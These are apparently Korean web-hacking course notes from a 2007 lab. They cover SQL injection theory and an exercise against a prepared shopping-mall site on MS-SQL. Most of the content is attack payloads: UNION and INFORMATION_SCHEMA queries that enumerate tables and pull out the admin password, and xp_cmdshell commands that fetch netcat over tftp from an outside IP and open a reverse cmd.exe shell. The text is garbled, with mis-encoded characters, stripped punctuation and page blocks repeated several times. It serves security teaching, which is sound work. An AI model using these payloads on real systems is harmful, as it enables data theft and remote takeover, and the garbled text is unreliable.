kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

